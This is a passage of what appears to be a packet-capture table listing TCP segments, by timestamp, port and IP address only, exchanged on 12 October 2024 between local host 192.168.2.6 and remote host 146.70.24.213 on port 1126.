Oct 12, 2024 20:30:05.414138079 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.414174080 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.414180040 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.414210081 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.414246082 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.414252043 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.414282084 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.414314985 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.414344072 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.414351940 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.414388895 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.414400101 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.414422035 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.414453030 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.414463997 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.414488077 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.414530039 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.414578915 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.414632082 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.414668083 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.414673090 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.414719105 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.414752007 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.414760113 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.414786100 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.414825916 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.414829969 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.415853024 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.415904045 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.415930033 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.415961981 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.415996075 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.416011095 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.416033030 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.416068077 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.416079044 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.416105986 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.416140079 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.416147947 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.416238070 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.416270971 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.416280985 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.416306019 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.416346073 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.416348934 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.416409016 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.416450024 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.416460037 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.416493893 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.416527033 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.416536093 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.416565895 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.416604042 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.416609049 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.416636944 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.416670084 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.416676998 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.416703939 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.416734934 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.416743994 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.416769028 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.416800022 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.416809082 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.416832924 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.416867018 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.416873932 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.416901112 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.416933060 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.416943073 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.418690920 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.418728113 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.418765068 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.418786049 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.418817997 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.418844938 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.418876886 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.418925047 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.418931007 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.418987036 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.419020891 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.419037104 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.419054985 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.419095039 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.419107914 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.419151068 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.419183969 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.419198990 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.419219017 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.419256926 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.419264078 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.419290066 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.419322014 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.419352055 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.419354916 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.419406891 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.419423103 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.419440031 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.419472933 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.419497967 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.419507027 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.419548035 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.419558048 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.419584036 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.419620037 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.419627905 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.419655085 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.419707060 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.419718981 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.419743061 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.419779062 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.419787884 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.419817924 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.419847012 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.419879913 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.419879913 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.419918060 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.419930935 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.419951916 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.419989109 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.420000076 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.420022011 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.420058966 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.420069933 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.461000919 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.504400015 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.504448891 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.504486084 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.504502058 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.504520893 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.504554033 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.504590988 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.504590988 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.504623890 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.504636049 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.504661083 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.504702091 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.505578041 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.505637884 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.505693913 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.505709887 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.505770922 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.505812883 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.505826950 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.505887985 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.505929947 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.505943060 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.506014109 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.506057024 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.506063938 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.506100893 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.506140947 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.506155014 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.506191015 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.506237984 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.506247997 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.506299019 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.506331921 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.506341934 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.506364107 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.506402969 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.506419897 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.506436110 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.506469965 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.506484032 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.506505966 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.506539106 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.506550074 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.506575108 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.506608009 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.506609917 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.506640911 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.506673098 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.506686926 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.506705046 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.506737947 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.506748915 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.506768942 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.506802082 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.506812096 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.506834984 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.506867886 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.506875992 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.506901026 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.506934881 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.506944895 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.506967068 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.506999969 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.507003069 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.507031918 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.507074118 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.507076979 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.507117033 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.507153034 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.507153988 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.507189035 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.507230043 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.507242918 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.507277012 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.507309914 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.507318020 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.507348061 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.507380962 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.507394075 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.508668900 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.508697033 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.508713007 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.508716106 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.508737087 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.508748055 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.508753061 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.508769035 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.508786917 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.508790970 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.508809090 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.508822918 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.508829117 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.508840084 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.508857965 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.508867979 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.508876085 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.508892059 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.508898020 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.508914948 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.508929968 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.508944035 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.508945942 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.508965969 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.508970022 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.508980989 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.508999109 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.509012938 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.509018898 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.509037018 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.509040117 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.509056091 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.509072065 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.509078979 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.509085894 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.509103060 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.509113073 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.509149075 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.509160042 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.509175062 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.509192944 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.509206057 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.509221077 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.509222031 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.509242058 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.511152983 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511178970 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511197090 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511205912 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.511228085 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511235952 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.511348009 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511370897 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511393070 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.511395931 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511410952 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511425972 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511429071 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.511440992 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511456966 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511461020 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.511475086 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511490107 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511501074 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.511512995 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511524916 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.511528015 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511543989 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511560917 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511571884 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.511575937 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511598110 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511603117 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.511651993 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511667967 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511671066 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.511684895 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511708021 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.511710882 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511738062 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511753082 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511758089 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.511775970 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511792898 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511804104 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.511814117 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511840105 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511840105 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.511873960 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511877060 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.511889935 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511905909 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511921883 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511939049 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.511940956 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511955976 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511969090 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.511970997 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511986017 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.511993885 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.512047052 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.596736908 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.596834898 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.596888065 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.596900940 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.596925974 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.596961021 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.596987963 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.596997023 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.597032070 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.597043991 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.597065926 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.597112894 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.598412037 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.598481894 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.598536015 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.598546028 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.598570108 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.598603964 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.598623991 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.598655939 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.598692894 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.598699093 CEST	49710	1126	192.168.2.6	146.70.24.213
